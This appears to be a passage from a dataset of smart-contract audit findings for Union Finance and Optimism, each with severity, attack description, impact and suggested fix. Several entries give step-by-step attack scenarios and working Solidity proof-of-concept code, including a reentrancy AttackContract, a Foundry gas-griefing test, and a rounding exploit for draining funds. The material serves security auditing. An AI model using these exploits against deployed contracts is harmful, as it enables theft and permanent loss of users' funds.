userManager,\\n address account,\\n address token,\\n uint256 futureBlocks\\n ) internal returns (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) {\\n userInfo = users[account][token];\\n uint256 lastUpdatedBlock = userInfo.updatedBlock;\\n if (block.number < lastUpdatedBlock) {\\n lastUpdatedBlock = block.number;\\n }\\n\\n pastBlocks = block.number - lastUpdatedBlock + futureBlocks;\\n\\n (user.effectiveStaked, user.effectiveLocked, user.isMember) = userManager.onWithdrawRewards(\\n account,\\n pastBlocks\\n );\\n }\\n```\\n\\n```\\nfunction onWithdrawRewards(address staker, uint256 pastBlocks)\\n external\\n returns (\\n uint256 effectiveStaked,\\n uint256 effectiveLocked,\\n bool isMember\\n )\\n {\\n if (address(comptroller) != msg.sender) revert AuthFailed();\\n uint256 memberTotalFrozen = 0;\\n (effectiveStaked, effectiveLocked, memberTotalFrozen) = _getEffectiveAmounts(staker, pastBlocks);\\n stakers[staker].stakedCoinAge = 0;\\n stakers[staker].lastUpdated = uint64(block.number);\\n stakers[staker].lockedCoinAge = 0;\\n frozenCoinAge[staker] = 0;\\n getLastWithdrawRewards[staker] = block.number;\\n\\n uint256 memberFrozenBefore = memberFrozen[staker];\\n if (memberFrozenBefore != memberTotalFrozen) {\\n memberFrozen[staker] = memberTotalFrozen;\\n totalFrozen = totalFrozen - memberFrozenBefore + memberTotalFrozen;\\n }\\n\\n isMember = stakers[staker].isMember;\\n }\\n```\\n\\n```\\nfunction _getEffectiveAmounts(address stakerAddress, uint256 pastBlocks)\\n private\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 memberTotalFrozen = 0;\\n CoinAge memory coinAge = _getCoinAge(stakerAddress);\\n\\n uint256 overdueBlocks = uToken.overdueBlocks();\\n uint256 voucheesLength = vouchees[stakerAddress].length;\\n // Loop through all of the stakers vouchees sum their total\\n // locked balance and sum their total currDefaultFrozenCoinAge\\n for (uint256 i = 0; i < voucheesLength; i++) {\\n // Get the vouchee record and look up the borrowers voucher record\\n // to get the locked amount and lastUpdated block number\\n Vouchee memory vouchee = vouchees[stakerAddress][i];\\n Vouch memory vouch = vouchers[vouchee.borrower][vouchee.voucherIndex];\\n\\n uint256 lastRepay = uToken.getLastRepay(vouchee.borrower);\\n uint256 repayDiff = block.number - _max(lastRepay, coinAge.lastWithdrawRewards);\\n uint256 locked = uint256(vouch.locked);\\n\\n if (overdueBlocks < repayDiff && (coinAge.lastWithdrawRewards != 0 || lastRepay != 0)) {\\n memberTotalFrozen += locked;\\n if (pastBlocks >= repayDiff) {\\n coinAge.frozenCoinAge += (locked * repayDiff);\\n } else {\\n coinAge.frozenCoinAge += (locked * pastBlocks);\\n }\\n }\\n\\n uint256 lastUpdateBlock = _max(coinAge.lastWithdrawRewards, uint256(vouch.lastUpdated));\\n coinAge.lockedCoinAge += (block.number - lastUpdateBlock) * locked;\\n }\\n\\n return (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n }\\n```\\n\\n```\\nfunction _getCoinAge(address stakerAddress) private view returns (CoinAge memory) {\\n Staker memory staker = stakers[stakerAddress];\\n\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 diff = block.number - _max(lastWithdrawRewards, uint256(staker.lastUpdated));\\n\\n CoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n return coinAge;\\n }\\n```\\n\\nBelow you can see the function _calculateRewardsByBlocks:\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = _getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\nч```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n -Attackers can call UToken.redeem() and drain the funds in assetManagerчmediumчAttackers can call `UToken.redeem()` and drain the funds in assetManager, taking advantage of the following vulnerability: due to round error, it is possible that uTokenAmount = 0; the redeem()function does not check whether `uTokenAmount = 0` and will redeem the amount of `underlyingAmount` even when zero uTokens are burned.\\nConsider the following attack scenario:\\nSuppose `exchangeRate = 1000 WAD`, that is each utoken exchanges for 1000 underlying tokens.\\nAttacker B calls `redeem(0, 999)`, then the else-part of the following code will get executed:\\n```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n\\nwe have `uTokenAmount = 999*WAD/1000WAD = 0`, and `underlyingAmount = 999`.\\nSince `redeeem()` does not check whether `uTokenAmount = 0` and the function will proceed. When finished, the attacker will get 999 underlying tokens, but burned no utokens. He stole 999 underlying tokens.\\nThe attacker can accomplish draining the `assetManger` by writing a malicious contract/function using a loop to run `redeem(0, exchangeRate/WAD-1)` multiple times (as long as not running of gas) and will be able to steal more funds in one SINGLE transaction. Running this transaction a few times will drain `assetManager` easily. This attack will be successful when `exchangeRate/WAD-1 > 0`. Here we need to consider that `exchangeRate` might change due to the decreasing of `totalReeemable`. So in each iteration, when we call `redeem(0, exchangeRate/WAD-1)`, the second argument is recalculated.чIssue Attackers can call UToken.redeem() and drain the funds in assetManager\\nRevise `redeem()` so that it will revert when `uTokenAmount = 0`.чAn attacker can keep calling redeem() and drain the funds in `assetManager`.ч```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n -Malicious user can finalize other's withdrawal with less than specified gas limit, leading to loss of fundsчhighчTransactions to execute a withdrawal from the Optimism Portal can be sent with 5122 less gas than specified by the user, because the check is performed a few operations prior to the call. Because there are no replays on this contract, the result is that a separate malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be initiated directly from the `L2ToL1MessagePasser` contract on L2. These withdrawals can be withdrawn directly from the `OptimismPortal` on L1. This path is intended to be used only by users who know what they are doing, presumably to save the gas of going through the additional more “user-friendly” contracts.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nHowever, there is an issue in the implementation of `OptimismPortal` that a withdrawal transaction can be executed with 5122 gas less than the user specified. In many cases, this could cause their transaction to revert, without any user error involved. Optimism is aware of the importance of this property being correct when they write in the comments:\\nWe want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.\\nThis property is not maintained because of the gap between the check and the execution.\\nThe check is as follows, where FINALIZE_GAS_BUFFER == 20_000:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n\\nAfter this check, we know that the current execution context has at least 20,000 more gas than the gas limit. However, we then proceed to spend gas by (a) assigning the `l2Sender` storage variable, which uses 2900 gas because it's assigning from a non-zero value, and (b) perform some additional operations to prepare the contract for the external call.\\nThe result is that, by the time the call is sent with `gasleft()` - FINALIZE_GAS_BUFFER gas, `gasleft()` is 5122 lower than it was in the initial check.\\nMathematically, this can be expressed as:\\n`gasAtCheck >= gasLimit + 20000`\\n`gasSent == gasAtCall - 20000`\\n`gasAtCall == gasAtCheck - 5122`\\nRearranging, we get `gasSent >= gasLimit + 20000 - 5122 - 20000`, which simplifies to `gasSent >= gasLimit - 5122`.чInstead of using one value for `FINALIZE_GAS_BUFFER`, two separate values should be used that account for the gas used between the check and the call.чFor any withdrawal where a user sets their gas limit within 5122 of the actual gas their execution requires, a malicious user can call `finalizeWithdrawalTransaction()` on their behalf with enough gas to pass the check, but not enough for execution to succeed.\\nThe result is that the withdrawing user will have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000,\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Portal.sol\";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 44_602}(1);\\n assert(gu.s(0) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 44_602,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: abi.encodeWithSignature(\"store(uint256)\", 1)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(\"OptimismPortal: insufficient gas to finalize withdrawal\"));\\n _executePortalWithGivenGas(65681);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(70803);\\n assert(gu.s(0) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(65682);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(70802);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nSummarizing the results of this test:\\nWe verify that the call to the target contract succeeds with 44,602 gas, and set that as gasLimit for all tests.\\nWhen we send 65,681 or less gas, it's little enough to be caught by the require statement.\\nWhen we send 70,803 or more gas, the transaction will succeed.\\nWhen we send any amount of gas between these two values, the require check is passed but the transaction fails.ч```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n -Causing users lose their fund during finalizing withdrawal transactionчhighчA malicious user can make users lose their fund during finalizing their withdrawal. This is possible due to presence of reentrancy guard on the function `relayMessage`.\\nBob (a malicious user) creates a contract (called AttackContract) on L1.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n\\n```\\n if (!donotRevert) {\\n revert();\\n }\\n```\\n\\nThen, Bob calls the function `enableRevert` to set `donotRevert` to `true`. So that if later the function `attack()` is called again, it will not revert.\\n```\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n```\\n\\nThen, Bob notices that Alice is withdrawing large amount of fund from L2 to L1. Her withdrawal transaction is proved but she is waiting for the challenge period to be finished to finalize it.\\nThen, Bob calls the function `setMetaData` on the contract `AttackContract` with the following parameter:\\n`_tx` = Alice's withdrawal transaction\\nBy doing so, the `metaData` will be equal to `finalizeWithdrawalTransaction.selector` + Alice's withdrawal transaction.\\n```\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n```\\n\\nNow, after the challenge period is passed, and before the function `finalizeWithdrawalTransaction` is called by anyone (Alice), Bob calls the function `relayMessage` with the required data to retry his previous failed message again.\\nThis time, since `donotRevert` is `true`, the call to function `attack()` will not revert, instead the body of `else clause` will be executed.\\n```\\n else {\\n optimismPortalAddress.call(metaData);\\n }\\n```\\n\\nIn summary the attack is as follows:\\nBob creates a malicious contract on L1 called `AttackContract`.\\nBob sends a message from L2 to L1 to call the function `AttackContract.attack` on L1.\\nOn L1 side, after the challenge period is passed, the function `AttackContract.attack` will be called.\\nMessage relay on L1 will be unsuccessful, because the function `AttackContract.attack` reverts. So, Bob's message will be flagged as failed message.\\nBob sets `AttackContract.donotRevert` to true.\\nBob waits for an innocent user to request withdrawal transaction.\\nBob waits for the innocent user's withdrawal transaction to be proved.\\nBob sets meta data in his malicious contract based on the innocent user's withdrawal transaction.\\nBob waits for the challenge period to be passed.\\nAfter the challenge period is elapsed, Bob retries to relay his failed message again.\\n`CrossDomainMessenger.relayMessage` will call the `AttackContract.attack`, then it calls `OptimismPortal.finalizeWithdrawalTransaction` to finalize innocent user's withdrawal transaction. Then, it calls `CrossDomainMessenger.relayMessage`, but it will be unsuccessful because of reentrancy guard.\\nAfter finalizing the innocent user's withdrawal transaction, Bob's message will be flagged as successful.\\nSo, innocent user's withdrawal transaction is flagged as finalized, while it is not.ч```\\n try IL1CrossDomainMessanger.relayMessage(// rest of code) {} catch Error(string memory reason) {\\n if (\\n keccak256(abi.encodePacked(reason)) ==\\n keccak256(abi.encodePacked(\"ReentrancyGuard: reentrant call\"))\\n ) {\\n revert(\"finalizing should be reverted\");\\n }\\n }\\n```\\nчBy doing this attack it is possible to prevent users from withdrawing their fund. Moreover, they lose their fund because withdrawal is flagged as finalized, but the withdrawal sent to `L1CrossDomainMessanger` was not successful.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n -Censorship resistance is undermined and bridging of assets can be DOSed at low costчmediumчAll L1->L2 transactions go through OptimismPortal's `depositTransaction` function. It is wrapped through the `metered` modifier. The goal is to create a gas market for L1->L2 transactions and not allow L1 TXs to fill up L2 batches (as the gas for deposit TX in L2 is payed for by the system), but the mechanism used makes it too inexpensive for a malicious user to DOS and censor deposits.\\nIt is possible for a malicious actor to snipe arbitrary L1->L2 transactions in the mempool for far too cheaply. This introduces two impacts:\\nUndermines censorship resistance guarantees by Optimism\\nGriefs users who simply want to bridge assets to L2\\nThe core issue is the check in ResourceMetering.sol:\\n```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n \"ResourceMetering: cannot buy more gas than available gas limit\"\\n);\\n```\\n\\nNote that `params.prevBoughtGas` is reset per block. This means attacker can view a TX in the mempool and wrap up the following flashbot bundle:\\nAttacker TX to `depositTransaction`, with gasLimit = 8M (MAX_RESOURCE_LIMIT)\\nVictim TX to `depositTransaction`\\nThe result is that attacker's transaction will execute and victim's TX would revert. It is unknown how this affects the UI and whether victim would be able to resubmit this TX again easily, but regardless it's clearly griefing user's attempt to bridge an asset. Note that a reverted TX is different from an uncompleted TX from a UX point of view.\\nFrom a censorship resistance perspective, there is nothing inherently preventing attack to continually use this technique to block out all TXs, albert gas metering price will rise as will be discussed.\\nNow we can demonstrate the cost of the attack to be low. Gas burned by the modifier is calculated as:\\n```\\n// Determine the amount of ETH to be paid.\\nuint256 resourceCost = _amount * params.prevBaseFee;\\n// rest of code\\nuint256 gasCost = resourceCost / Math.max(block.basefee, 1000000000);\\n```\\n\\n`params.prevBaseFee` is initialized at 1e9 and goes up per block by a factor of 1.375 when gas market is drained, while going down by 0.875 when gas market wasn't used at all.\\nIf we take the initial value, `resourceCost = 8e6 * 1e9 = 8e15`. If we assume tip is negligible to `block.basefee`, L1 gas cost in ETH equals `resourceCost` (divide by basefee and multiply by basefee). Therefore, cost of this snipe TX is:\\n`8e15 / 1e18 (ETH decimals) * 1600 (curr ETH price) = $12.80`\\nThe result is an extremely low price to pay, and even taking into account extra tips for frontrunning, is easily achievable.\\nIn practice `prevBaseFee` will represent the market price for L2 gas. If it goes lower than initial value, DOSing will become cheaper, while if it goes higher it will become more expensive. The key problem is that the attacker's cost is too similar to the victim's cost. If victim is trying to pass a 400k TX, attacker needs to buy a 7.6M of gas. This gap is too small and the resulting situation is that for DOS to be too expensive for attacker, TX would have to be far too expensive for the average user.чIt is admittedly difficult to balance the need for censorship resistance with the prevention of L2 flooding via L1 TXs. However, the current solution which will make a victim's TX revert at hacker's will is inadequate and will lead to severe UX issues for users.чCensorship resistance is undermined and bridging of assets can be DOSed at low cost.ч```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n \"ResourceMetering: cannot buy more gas than available gas limit\"\\n);\\n```\\n -[High] Function MigrateWithdrawal() may set gas limit so high for old withdrawals when migrating them by mistake and they can't be relayed in the L1 and users funds would be lostчmediumчFunction `MigrateWithdrawal()` in migrate.go will turn a LegacyWithdrawal into a bedrock style Withdrawal. it should set a min gas limit value for the withdrawals. to calculate a gas limit contract overestimates it and if the value goes higher than L1 maximum gas in the block then the withdraw can't be relayed in the L1 and users funds would be lost while the withdraw could be possible before the migration it won't be possible after it.\\nThis is `MigrateWithdrawal()` code:\\n```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs you can see it sets the gas limit as `gasLimit := uint64(len(data)*16 + 200_000)` and contract set 16 gas per data byte but in Ethereum when data byte is 0 then the overhead intrinsic gas is 4 and contract overestimate the gas limit by setting 16 gas for each data. this can cause messages with big data(which calculated gas is higher than 30M) to not be relay able in the L1 because if transaction gas set lower than calculated gas then OptimisimPortal would reject it and if gas set higher than calculated gas then miners would reject the transaction. while if code correctly estimated the required gas the gas limit could be lower by the factor of 4. for example a message with about 2M zeros would get gas limit higher than 30M and it won't be withdrawable in the L1 while the real gas limit is 8M which is relayable.чcalculate gas estimation correctly, 4 for 0 bytes and 16 for none zero bytes.чsome withdraw messages from L2 to L1 that could be relayed before the migration can't be relayed after the migration because of the wrong gas estimation.ч```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n -Migration can be bricked by sending a message directly to the LegacyMessagePasserчmediumчThe migration process halts and returns an error if any of the withdrawal data breaks from the specified format. However, the data for this migration comes from every call that has been made to the LegacyMessagePasser (0x00) address, and it is possible to send a transaction that would violate the requirements. The result is that the migration process would be bricked and need to be rebuilt, with some difficult technical challenges that we'll outline below.\\nWithdrawal data is saved in l2geth whenever a call is made to the LegacyMessagePasser address:\\n```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n\\nThis will save all the calls that came via the L2CrossDomainMessenger. The expected format for the data is encoded in the L2CrossDomainMessenger. It encodes the calldata to be executed on the L1 side as: `abi.encodeWithSignature(\"relayMessage(...)\", target, sender, message, nonce)`\\nThe migration process expects the calldata to follow this format, and expects the call to come from L2CrossDomainMessenger, implemented with the following two checks:\\n```\\nselector := crypto.Keccak256([]byte(\"relayMessage(address,address,bytes,uint256)\"))[0:4]\\nif !bytes.Equal(data[0:4], selector) {\\n return fmt.Errorf(\"invalid selector: 0x%x\", data[0:4])\\n}\\n\\nmsgSender := data[len(data)-len(predeploys.L2CrossDomainMessengerAddr):]\\nif !bytes.Equal(msgSender, predeploys.L2CrossDomainMessengerAddr.Bytes()) {\\n return errors.New(\"invalid msg.sender\")\\n}\\n```\\n\\nThe migration process will be exited and the migration will fail if this assumption is violated.\\nHowever, since the function on the LegacyMessagePasser is public, it can also be called directly with arbitrary calldata:\\n```\\nfunction passMessageToL1(bytes memory _message) external {\\n sentMessages[keccak256(abi.encodePacked(_message, msg.sender))] = true;\\n}\\n```\\n\\nThis allows us to submit calldata that would violate both of these checks and cause the migration to panic and fail.\\nWhile it may seem easy to filter these withdrawals out and rerun the migration, this solution would not work either. That's because, later in the process, we check that easy storage slot in the LegacyMessagePasser contract has a corresponding withdrawal in the migration:\\n```\\nfor slot := range slotsAct {\\n _, ok := slotsInp[slot]\\n if !ok {\\n return nil, fmt.Errorf(\"unknown storage slot in state: %s\", slot)\\n }\\n}\\n```\\n\\nThe result is that the Optimism team would need to unwind the migration, develop a new migration process to account for this issue, and remigrate with an untested system.чRather than throwing an error if withdrawal data doesn't meet the requirements, save a list of these withdrawals and continue. Include this list when prechecking withdrawals to ensure that they are included in the storage slot matching process, but not included in withdrawals to be transferred to the new system.\\nSpecial note\\nAfter coming up with this attack, we've noticed that someone has done exactly what we described and sent a message directly to the MessagePasser! Obviously this TX has nothing to do with us and we want to make sure Optimism is absolutely safe during migration. Furthermore, this TX should be traced and if a contestant is linked to this then they should clearly be disqualified from being rewarded.чExploitation of this bug would lead to significant challenges for the Optimism team, needing to run a less tested migration process (which could lead to further issues), and a significant amount of FUD in pausing a partially completed migration partway through. We think that the ability to unexpectedly shut down the migration causes enough structural damage as well as second-order financial damage to warrant high severity.ч```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n -Withdrawals with high gas limits can be bricked by a malicious user, permanently locking fundsчhighчTransactions to execute a withdrawal from the Optimism Portal require the caller to send enough gas to cover `gasLimit` specified by the withdrawer.\\nBecause the EVM limits the total gas forwarded on to 63/64ths of the total `gasleft()` (and silently reduces it to this value if we try to send more) there are situations where transactions with high gas limits will be vulnerable to being reverted.\\nBecause there are no replays on this contract, the result is that a malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be withdrawn from L2's `L2ToL1MessagePasser` contract to L1's `OptimismPortal` contract. This is a less \"user-friendly\" withdrawal path, presumably for users who know what they are doing.\\nOne of the quirks 